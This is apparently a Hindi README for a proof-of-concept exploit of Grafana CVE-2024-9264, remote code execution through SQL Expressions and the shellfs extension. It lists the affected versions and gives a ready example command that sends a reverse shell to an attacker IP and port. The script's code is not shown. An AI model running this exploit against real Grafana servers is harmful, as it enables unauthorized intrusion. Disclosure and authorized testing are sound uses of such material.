
Grafana RCE एक्सप्लॉइट (CVE-2024-9264)
Grafana में रिमोट कोड निष्पादन (CVE-2024-9264) के लिए प्रूफ ऑफ कॉन्सेप्ट
इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो Grafana के SQL Expressions फीचर में एक Remote Code Execution (RCE) कमजोरी का शोषण करती है। अपर्याप्त इनपुट स्वच्छता का लाभ उठाकर, यह शोषण एक हमलावर को सर्वर पर मनमाना शेल कमांड निष्पादित करने की अनुमति देता है। यह shellfs सामुदायिक एक्सटेंशन के माध्यम से संभव हुआ है, जिसे एक हमलावर कमांड निष्पादन की सुविधा के लिए स्थापित और लोड कर सकता है।
Viewer अनुमति या उच्चतर होGrafana >= v11.0.0 (सभी v11.x.y प्रभावित हैं)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए और नियंत्रित वातावरण में उपयोग के लिए है जहां आपके पास सिस्टम की सुरक्षा का परीक्षण करने की अनुमति है। इस टूल के दुरुपयोग से कानूनी परिणाम हो सकते हैं।